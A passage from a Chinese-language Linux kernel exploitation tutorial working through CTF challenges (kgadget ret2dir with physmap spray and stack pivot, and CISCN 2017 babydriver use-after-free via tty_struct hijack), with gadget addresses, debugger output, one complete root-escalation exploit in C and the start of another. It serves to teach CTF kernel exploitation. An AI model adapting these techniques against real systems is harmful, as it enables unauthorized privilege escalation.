 * On hw interrupt, it's IRQ number:
 */
        unsigned long orig_rax;
/* Return frame for iretq */
        unsigned long rip;
        unsigned long cs;
        unsigned long eflags;
        unsigned long rsp;
        unsigned long ss;
/* top of stack page */
};

由于这里我曾经写过操作系统,所以这里的结构体一眼可以看出是中断发生时所保存的寄存器结构,他是被压在内核栈当中的,然后我们的ioctl函数实际上是将r15~r12、rbp、rbx以及r10置为了无效值,仅仅保留了几个关键寄存器值。
然后最后一条语句

.text.unlikely:0000000000000195
.text.unlikely:000000000000019A E8 B1 0E 00 00                call    __x86_indirect_thunk_rbx        ; PIC mode

这里是编译器的优化,实际上等同于call rbx, 而rbx种我们保存的是我们刚刚传递的函数
我们分析完ioctl,我们来看看qemu的启动脚本

  1 #!/bin/sh
  2 qemu-system-x86_64 \
  3   -m 256M \
  4   -cpu kvm64,+smep,+smap \
  5   -smp cores=2,threads=2 \
  6   -kernel bzImage \
  7   -initrd ./rootfs.cpio \
  8   -nographic \
  9   -monitor /dev/null \
 10   -snapshot \
 11   -append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \                                                                                                                                                              
 12   -no-reboot

3.前期准备

我们可以看到这里是开启了smep和smap,阻隔了内核访问用户数据或代码,还有就是nokalsr,说明我们可以通过vmlinux来获取关键函数的地址
首先我们目前是只拥有bzImage,因此我们通过下面脚本来获取其中的vmlinux,然后来获取关键函数地址

  • 这里获取vmlinux有两种方法,其中之一就是下面的extract-vmlinux脚本,不过有的地方会有不同程度的失败,要么是无法真正解压,要么是解压出来没有符号表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/bin/sh
# SPDX-License-Identifier: GPL-2.0-only
# ----------------------------------------------------------------------
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
#
# Inspired from extract-ikconfig
# (c) 2009,2010 Dick Streefland <[url=mailto:dick@streefland.net]dick@streefland.net[/url]>
#
# (c) 2011 Corentin Chary <[url=mailto:corentin.chary@gmail.com]corentin.chary@gmail.com[/url]>
#
# ----------------------------------------------------------------------

check_vmlinux()
{
# Use readelf to check if it's a valid ELF
# TODO: find a better to way to check that it's really vmlinux
# and not just an elf
readelf -h $1 > /dev/null 2>&1 || return 1

cat $1
exit 0
}

try_decompress()
{
# The obscure use of the "tr" filter is to work around older versions of
# "grep" that report the byte offset of the line instead of the pattern.

# Try to find the header ($1) and decompress from here
for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
do
pos=${pos%%:*}
tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
check_vmlinux $tmp
done
}

# Check invocation:
me=${0##*/}
img=$1
if [ $# -ne 1 -o ! -s "$img" ]
then
echo "Usage: $me <kernel-image>" >&2
exit 2
fi

# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0

# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh' xy bunzip2
try_decompress '\135\0\0\0' xxx unlzma
try_decompress '\211\114\132' xy 'lzop -d'
try_decompress '\002!L\030' xxx 'lz4 -d'
try_decompress '(\265/\375' xxx unzstd

# Finally check for uncompressed images or objects:
check_vmlinux $img

# Bail out:
echo "$me: Cannot find vmlinux." >&2

另外一种方法就是使用比较完善的vmlinux-to-elf,具体github地址如下:

vmlinux-to-elf

下)面我们获取两个函数的地址:

ffffffff810c92e0 <commit_creds>:
ffffffff810c9540 <prepare_kernel_cred>:

大家应该还记得咱们提权的方法吧,那就是想办法执行commit_creds(prepare_kernel_cred(NULL)),将内核权限赋予新进程

回顾我们上面的利用手法,我们需要再用户程序申请大量的内存来增加我们再内核态找到对应物理内存的几率,因此我们再C用户程序种使用mmap函数来进行匿名内存映射:

1
map_spray[0] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

现在我们还需要找到一些gadget来进行我们的利用

如同之前内核ROP,我们同样需要找到swapgsiretq等语句,但是本题的启动脚本我们可以发现开启了kpti,这导致我们在构造返回用户态的时候需要修改cr3寄存器,也就是改一下我们的页表地址,因此我们可以利用下面我们获得到的一个内核函数,该函数就包括了咱们swapgs;ireq;这样的指令,但是这里注意,整个函数可以用下面的形式来表示

1
2
3
4
swapgs;
pop;
pop;
iretq;

所以说我们构造ROP链的时候需要加两个padding:)

swapgs_restoer_regs_and_return_to_usermode,如下:

.text:FFFFFFFF81C00FB0                               public swapgs_restore_regs_and_return_to_usermode
.text:FFFFFFFF81C00FB0                               swapgs_restore_regs_and_return_to_usermode proc near
.text:FFFFFFFF81C00FB0                                                                       ; CODE XREF: ret_from_fork+15↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+54↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+65↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+74↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+87↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+94↑j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_64_after_hwframe+A3↑j
.text:FFFFFFFF81C00FB0                                                                       ; error_return+E↓j
.text:FFFFFFFF81C00FB0                                                                       ; asm_exc_nmi+93↓j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSENTER_compat_after_hwframe+4F↓j
.text:FFFFFFFF81C00FB0                                                                       ; entry_SYSCALL_compat_after_hwframe+47↓j
.text:FFFFFFFF81C00FB0                                                                       ; entry_INT80_compat+85↓j
.text:FFFFFFFF81C00FB0                                                                       ; DATA XREF: print_graph_irq+D↑o
.text:FFFFFFFF81C00FB0                                                                       ; print_graph_entry+59↑o
.text:FFFFFFFF81C00FB0 90                            nop                                     ; Alternative name is '__irqentry_text_end'
.text:FFFFFFFF81C00FB1 90                            nop
.text:FFFFFFFF81C00FB2 90                            nop
.text:FFFFFFFF81C00FB3 90                            nop
.text:FFFFFFFF81C00FB4 90                            nop
.text:FFFFFFFF81C00FB5 41 5F                         pop     r15
.text:FFFFFFFF81C00FB7 41 5E                         pop     r14
.text:FFFFFFFF81C00FB9 41 5D                         pop     r13
.text:FFFFFFFF81C00FBB 41 5C                         pop     r12
.text:FFFFFFFF81C00FBD 5D                            pop     rbp
.text:FFFFFFFF81C00FBE 5B                            pop     rbx
.text:FFFFFFFF81C00FBF 41 5B                         pop     r11
.text:FFFFFFFF81C00FC1 41 5A                         pop     r10
.text:FFFFFFFF81C00FC3 41 59                         pop     r9
.text:FFFFFFFF81C00FC5 41 58                         pop     r8
.text:FFFFFFFF81C00FC7 58                            pop     rax
.text:FFFFFFFF81C00FC8 59                            pop     rcx
.text:FFFFFFFF81C00FC9 5A                            pop     rdx
.text:FFFFFFFF81C00FCA 5E                            pop     rsi                             ;直到这里可以发现咱们是在主动恢复一些当时中断保存的pt_regs寄存器组
.text:FFFFFFFF81C00FCB 48 89 E7                      mov     rdi, rsp                        ;我们可以跳过这些寄存器直接开整
.text:FFFFFFFF81C00FCE 65 48 8B 24 25 04 60 00 00    mov     rsp, gs:qword_6004
.text:FFFFFFFF81C00FD7 FF 77 30                      push    qword ptr [rdi+30h]
.text:FFFFFFFF81C00FDA FF 77 28                      push    qword ptr [rdi+28h]
.text:FFFFFFFF81C00FDD FF 77 20                      push    qword ptr [rdi+20h]
.text:FFFFFFFF81C00FE0 FF 77 18                      push    qword ptr [rdi+18h]
.text:FFFFFFFF81C00FE3 FF 77 10                      push    qword ptr [rdi+10h]
.text:FFFFFFFF81C00FE6 FF 37                         push    qword ptr [rdi]
.text:FFFFFFFF81C00FE8 50                            push    rax
.text:FFFFFFFF81C00FE9 EB 43                         jmp     short loc_FFFFFFFF81C0102E
...........
.text:FFFFFFFF81C0102E                               loc_FFFFFFFF81C0102E:                   ; CODE XREF: swapgs_restore_regs_and_return_to_usermode+39↑j
.text:FFFFFFFF81C0102E 58                            pop     rax                             ;这里pop了两个值,所以需要在ROP种填充
.text:FFFFFFFF81C0102F 5F                            pop     rdi
.text:FFFFFFFF81C01030 0F 01 F8                      swapgs
.text:FFFFFFFF81C01033 FF 25 47 8D E4 00             jmp     cs:off_FFFFFFFF82A49D80

从这个名字也可以看出他是为了在中断例程结束后,从内核态返回用户态时所调用的函数,他首先会pop大量的寄存器来还原当时的环境,这里我们并不需要,所以我们需要的开始执行的地址就从0xFFFFFFFF81C00FCB进行咱们的利用,从这力同样可以返回用户态,因此这就是我们所需要的。

这里还有一点就是该vmlinux中并没有发现mov rdi rax;的指令,因此我们实现commit_creds(prepare_kernel_cred(NULL))有点困难,因此我们要利用到一个小知识点,那就是内核运行过程中会存在一个结构体init_cred,他表示root权限的结构体,因此我们改为实现commit_creds(init_cred),找到结果如下:

ffffffff810c9640:       f0 ff 05 b9 20 9a 01    lock inc DWORD PTR [rip+0x19a20b9]        # ffffffff82a6b700 <init_cred>

4.利用步骤

一些基本的gadget找到后我们如何让程序运行呢,这里我们来梳理一下本题中的关键点:

  • ioctl系统调用会执行我们传入的函数指针,但是这里只能传递内核的函数指针,由于开启了SMAP/SMEP所以会有访问控制
  • 我们大量使用mmap映射了大片用户内存到物理内存上,并且以页为单位构造相同的ROP链,因此此时我们只需要传递direct mapping中的某一个内核地址,如果我们mmap分配的内存达到了一定量级理论上我们随机挑一个内存直接映射区地址,大概率会跳转到我们用户态构建的ROP链上
  • 最后就是我们ROP的基础,让我们的链位于栈上,我们所构造的ROP链目前是改不了了,但我们可以利用栈迁移的知识,通过栈迁移跳转到目标ROP上进行稳定提权

5.栈迁移以及偏移计算

总结过后我们目前最后的点那就是进行栈迁移,但是如何进行栈迁移呢
经过我们之前的分析我们知道,在调用ioctl后,函数首先会对于其中的某些寄存器进行赋值操作,此时能够被咱们使用的是r8,r9了(不过这里暂时不太清楚,难道说是因为前面的寄存器都需要参与ioctl接下来的函数操作,而其他的寄存器由不尽数相连,无法构成迁移ROP?)
总之我们到r8、r9寄存器中填充我们的ROP链,也就是利用如下指令

1
pop rsp; ret

我们通过在r9中填入指令,然后到r8当中填入我们所猜测的地址,这样就将栈迁移到了我们所构造的mmap映射到的物理内存了,然后就进行ROP
这里同样找到该指令的地址

1
0xffffffff811483d0 : pop rsp ; ret

但是我们该如何执行到这里的指令呢,这里我们知道当我们进入内核态的时候,栈同时也会转移,并且内核态的栈会保存咱们用户态时寄存器的一些值,所以我们此时只需要将栈顶地址加上到达保存r9寄存器值得地址偏移就可以使得我们执行当时的指令了,这个具体偏移我们调试内核进行查找。
接下来我们先来查找一下kgadget的偏移,具体步骤在我之前的文章有讲解,也就是重新打包一下文件系统以及init脚本即可,链接如下:
Linux内核PWN环境准备

然后我们开始调试内核查看偏移:
首先我们先利用ioctl系统调用执行我们猜测的地址,这里我们填入的是一个add rsp val; ret类型的指令,目的就是让该指令能ret到r9,而r9中存放的是咱们的pop rsp; ret指令,从而实现栈迁移,这里我们先到伪造的内存页的第一条指令打上断点:

这里其实我填上的已经是找好的地址辣,但是目前我们假装不知道来寻找偏移,此时我们知道内核栈上应该存在6个attrnba的值,然后相隔1个又是他,这是attrnba师傅在写题的时候给的一个记号,如下:

因此我们在此刻查找对应栈看是否有这样的布局,我们浅看一下发现果然如此!

这里恰好跟我们预想的一致,而可以推算出r9寄存器值得地址保存在0xffffc900001a7f98,其实从旁边提示也知道是在这儿,而且底下得r8也确实是咱们猜测的地址,这里我们计算偏移也就是简单的减法:0xffffc900001a7f98 - 0xffffc900001a7ed8 = 0xc0
可知我们需要找到的ROP的第一条语句应该是add rsp, 0xc0,可是一切并不如我们所料,在遍历vmlinux中并没发现这样的语句,但是我们找到了他的一个替代
add rsp, 0xa0; pop rbx; pop r12; pop r13; pop rbp; ret,
这条指令也确实可以达成将栈增加0xc0的效果,然后之后就是正常的进行我们的rop链,这里我们构造ROP链是采取以下的方法

最底下的ROP链也是咱们构造的执行相应函数提权的链条然后返回用户态。

6.终极测试!

上面的步骤讲解完毕,我们就使用qemu进行测试

可以发现我们猜测的physmap中的任意地址,大概率都可以完成提权操作

下面是exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <ctype.h>
#include <sys/mman.h>

const size_t init_cred = 0xffffffff82a6b700;
const size_t commit_creds = 0xffffffff810c92e0;
const size_t prepare_kernel_cred = 0xffffffff810c9540;
const size_t swapgs_pop2_retuser = 0xFFFFFFFF81C00FB0 + 0x1B;
const size_t pop_rsp_ret = 0xffffffff811483d0;
const size_t add_rsp = 0xffffffff810737fe;
const size_t pop_rdi_ret = 0xffffffff8108c6f0;
const size_t ret = 0xffffffff810001fc;
long page_size; //一页大小
int dev;
size_t* map_spray[16000];
size_t guess;
size_t user_cs, user_ss, user_rflags, user_sp;void save_status();
void info_log(char*);
void error_log(char*);
void getShell();
void makeROP(size_t*);

void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}
void save_status(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
​ );
​ info_log("Status has been saved.");
​ }

void getShell(){
info_log("Ready to get root........");
if(getuid()){
error_log("Failed to get root!");
}
info_log("Root got!");
system("/bin/sh");
}
void makeROP(size_t* space){
int index = 0;
for(; index < (page_size / 8 - 0x30); index++)
space[index] = add_rsp;
for(; index < (page_size / 8 - 0x10); index++)
space[index] = ret;
space[index++] = pop_rdi_ret;
space[index++] = init_cred;
space[index++] = commit_creds;
space[index++] = swapgs_pop2_retuser;
space[index++] = 0xDeadBeef;
space[index++] = 0xdEADbEAF;
space[index++] = (size_t)getShell;
space[index++] = user_cs;
space[index++] = user_rflags;
space[index++] = user_sp;
space[index++] = user_ss;
}

int main(){
save_status();
dev = open("/dev/kgadget", O_RDWR);
if(dev < 0){
error_log("Cannot open device \"/dev/kgadget\"!");
}
page_size = sysconf(_SC_PAGESIZE);
info_log("Spraying physmap...");

map_spray[0] = mmap(NULL, page_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
makeROP(map_spray[0]);
info_log("make done!");
for(int i=1; i<15000; i++){
map_spray[i] = mmap(NULL, page_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if(!map_spray[i]){
error_log("Mmap Failed!");
}
memcpy(map_spray[i], map_spray[0], page_size);
}
guess = 0xFFFF888000000000 + 0x7000000;
info_log("Ready to ture to kernel.....");
__asm__("mov r15, 0xdeadbeef;"
"mov r14, 0xceadbeef;"
"mov r13, 0xbeadbeef;"
"mov r12, 0xaeadbeef;"
"mov r11, 0xdeadbeef;"
"mov r10, 0x123456;"
"mov rbp, 0x1234567;"
"mov rbx, 0x87654321;"
"mov r9, pop_rsp_ret;"
"mov r8, guess;"
"mov rax, 0x10;"
"mov rcx, 0x12344565;"
"mov rdx, guess;"
"mov rsi, 0x1bf52;"
"mov rdi, dev;"
"syscall;"
);
return 0;
}

三、Kernel Heap - UAF

例题:CISCN - 2017 - babydriver

典中典题,大伙珍惜,从中可以学到很多结构体的认识

1.题目逆向

首先就是检查一些脚本

1
2
3
4
5
#!/bin/bash                                                                                          
qemu-system-x86_64 -initrd core.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic
panic=1' -enable-kvm -monitor /dev/null -m 128M --nographic -smp cores=1,threads=1 -cpu kvm64,+smep
-s

  1. 单核单线程
  2. 开启smep(执行禁止)
  3. 在kvm64 和 +smep的情况下会自动开启KPTI

以及文件系统的启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0 -f

可以看到加载了一个babydriver.ko模块,大致就是需要逆这里
因此我们例行checksec一下

dawn@dawn-virtual-machine:~/KernelLearning/babydriver$ 
[*] '/home/dawn/KernelLearning/babydriver/extract/lib/modules/4.4.72/babydriver.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

然后就开始我们的逆向过程,如下:

babydriver_init没必要看,大致意思就是注册了一个/dev/babydev的设备,下面看fops

.data:00000000000008C0                               ; ===========================================================================
.data:00000000000008C0
.data:00000000000008C0                               ; Segment type: Pure data
.data:00000000000008C0                               ; Segment permissions: Read/Write
.data:00000000000008C0                               _data segment align_32 public 'DATA' use64
.data:00000000000008C0                               assume cs:_data
.data:00000000000008C0                               ;org 8C0h
.data:00000000000008C0                               public fops
.data:00000000000008C0                               ; file_operations fops
.data:00000000000008C0 C0 09 00 00 00 00 00 00 00 00+fops file_operations <offset __this_module, 0, offset babyread, offset babywrite, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 30 01 00 00+                                        ; DATA XREF: babydriver_init:loc_1AA↑o
.data:00000000000008C0 00 00 00 00 F0 00 00 00 00 00+                 offset babyioctl, 0, 0, offset babyopen, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+                 0>
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+_data ends
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+

这里也就是该设备的一个file_operations,实现了read,ioctl,open,write等函数,因此我们首先看open

int __fastcall babyopen(inode *inode, file *filp)
{
  __int64 v2; // rdx

  _fentry__(inode, filp);
  babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 64LL);
  babydev_struct.device_buf_len = 64LL;
  printk("device open\n", 0x24000C0LL, v2);
  return 0;
}

可以看到我们open的时候,他首先调用kmem_cache_alloc_trace函数分配了内核空间给全局变量babydev_struct的字段,然后赋值其中长度字段为64,然后我们来看ioctl函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// local variable allocation has failed, the output may be wrong!
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
size_t v3; // rdx
size_t v4; // rbx
__int64 v5; // rdx

_fentry__(filp, *(_QWORD *)&command);
v4 = v3;
if ( command == 0x10001 )
{
kfree(babydev_struct.device_buf);
babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
babydev_struct.device_buf_len = v4;
printk("alloc done\n", 0x24000C0LL, v5);
return 0LL;
}
else
{
printk(&unk_2EB, v3, v3);
return -22LL;
}
}

这里可以看到我们可以通过该函数来重新分配内核堆块给全局变量babydev_struct,这样显得open有点多余了说
然后我们来看关键漏洞点,也就是release函数,或者说close函数,如下:

1
2
3
4
5
6
7
8
9
int __fastcall babyrelease(inode *inode, file *filp)
{
__int64 v2; // rdx

_fentry__(inode, filp);
kfree(babydev_struct.device_buf);
printk("device release\n", filp, v2);
return 0;
}

可以看到他是释放掉了我们的全局变量指向的分配堆块,但并没有赋空值,所以存在一个悬垂指针供我们利用.
其余的read和write函数就是正常的读写,没必要单独贴出来.

2.利用tty_struct达成提权

我们的/dev目录下面存在一个伪终端设备/dev/ptmx,该设备打开后会创建一个tty_struct结构体,其中同其他设备一样存在着tty_operations结构体,因此不难理解我们可以利用UAF来劫持该结构体,然后覆写其中的函数指针至我们的ROP链来达成提权效果,大致思路如下:

  1. 分别打开两次, /dev/babydev,那么我们就能得到同时指向一个堆块的两个指针
  2. 我们通过ioctl函数来修改堆块的大小,改变成能劫持下面tty_struct的大小
  3. 然后我们释放掉其中一个设备,释放掉对应全局变量堆块,但是我们仍存在一个指向该释放堆块的指针
  4. 我们再打开/dev/ptmx设备,因此分配一个堆块来存放tty_struct结构体
  5. 我们就可以利用之前还剩余的那个指针来修改tty_struct指向我们构造的fake_operations(什么时候构造都可以,可以指向栈中,但是要在本步骤前熬)
  6. 之后我们调用fake_operations中的相关函数就可以达成任意代码执行,进而提权.

其中最主要的地方其实就是我们需要知道tty_struct的大小,然后修改之前堆块的大小来满足释放的堆块重新分配了.我们接下来就是寻找他的大小,这里直接剧透为0x2e0

其中tty_struct结构体的大致情况如下,位于include/linux/tty.h中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
struct tty_struct {
int magic;
struct kref kref;
struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
struct tty_driver *driver;
const struct tty_operations *ops;
int index;

/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;

struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
char name[64];
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */

struct {
spinlock_t lock;
bool stopped;
bool tco_stopped;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) flow;

struct {
spinlock_t lock;
struct pid *pgrp;
struct pid *session;
unsigned char pktstatus;
bool packet;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) ctrl;

int hw_stopped;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;

struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work; //这里存在一个函数指针,可以泄露基地址
struct tty_port *port;
} __randomize_layout;

其中值得注意的就是我们的const struct tty_operations *ops;
它指向一个tty_operations结构体,它位于include/linux/tty_driver.h当中, 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
unsigned int (*write_room)(struct tty_struct *tty);
unsigned int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
int (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
int (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;

这里我们执行到ROP链后写cr4寄存器为0x6f0来绕过SMEP,然后打ret2user,但这里每次提权成功后返回userland的时候到swapgs后的pop rbp总会报错

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
   0xffffffff81063694 <native_swapgs+4>      swapgs 
► 0xffffffff81063697 <native_swapgs+7> pop rbp
0xffffffff81063698 <native_swapgs+8> ret

0xffffffff814e35ef <tty_audit_log+239> iretq
0xffffffff814e35f1 <tty_audit_log+241> ret

0xffffffff814e35f2 <tty_audit_log+242> dec dword ptr [rax - 0x75]
0xffffffff814e35f5 <tty_audit_log+245> push rbp
0xffffffff814e35f6 <tty_audit_log+246> test al, init_module+36 <72>
0xffffffff814e35f8 <tty_audit_log+248> mov esi, dword ptr [rbp - 0x50]
0xffffffff814e35fb <tty_audit_log+251> mov rdi, rbx
0xffffffff814e35fe <tty_audit_log+254> call audit_log_n_hex <audit_log_n_hex>
──────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffeb93ba830 ◂— 0x0
01:0008│ 0x7ffeb93ba838 —▸ 0xffffffff814e35ef (tty_audit_log+239) ◂— iretq
02:0010│ 0x7ffeb93ba840 —▸ 0x402001 ◂— endbr64
03:0018│ 0x7ffeb93ba848 ◂— 0x33 /* '3' */
04:0020│ 0x7ffeb93ba850 ◂— 0x246
05:0028│ 0x7ffeb93ba858 —▸ 0x7ffeb93ba7d0 —▸ 0xffff880005fc7758 ◂— 0xcc
06:0030│ 0x7ffeb93ba860 ◂— 0x2b /* '+' */
07:0038│ 0x7ffeb93ba868 ◂— 0x0
──────────────────────────────────────────────────────────────────────────────────────────────────
► f 0 0xffffffff81063697 native_swapgs+7
──────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i all-registers cr3
cr3 0x5fe2000 [ PDBR=2 PCID=0 ]

据推测这里因该确实是KPTI开启的情况,但为什么加了nopti还是有这个存在呢,难以理解,但是本题利用的过程算是摸清楚了

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#define __USE_GNU
#include <pthread.h>

size_t prepare_kernel_cred = 0xffffffff810a1810;
size_t commit_creds = 0xffffffff810a1420;
size_t init_cred = 0xffffffff82a6b700;
const size_t pop_rdi = 0xffffffff810d238d;
const size_t pop_rsi = 0xffffffff811dd9ae;
const size_t pop_rdx = 0xffffffff81440b72;
const size_t mov_rc4_rdi_pop_rbp = 0xffffffff81004d80;
const size_t swapgs_pop_rbp = 0xffffffff81063694;
const size_t iretq = 0xffffffff8181a797;
const size_t mov_rsp_rax_ret = 0xffffffff8181bfc5;
const size_t pop_rax_ret = 0xffffffff8100ce6e;
const size_t mov_rdi_rax_pop2 = 0xffffffff8133b32e;

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)


void info_log(char*);
void error_log(char*);
void saveStatus();
void get_shell();
void getRootPrivilige();
void bind_cpu(int);

size_t user_cs, user_ss, user_rflags, user_sp;


void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("Status has been saved Successfully!");
}


void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}

void get_shell(){
system("/bin/sh");
}


void getRootPrivilige(void)
{
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

void main(){
saveStatus();
int i;

size_t buff[0x10] = {0};
size_t rop[0x100] = {0};
size_t fake_tty_operations[0x30] = {0};
PRINT_ADDR("fake_tty_operations", fake_tty_operations);
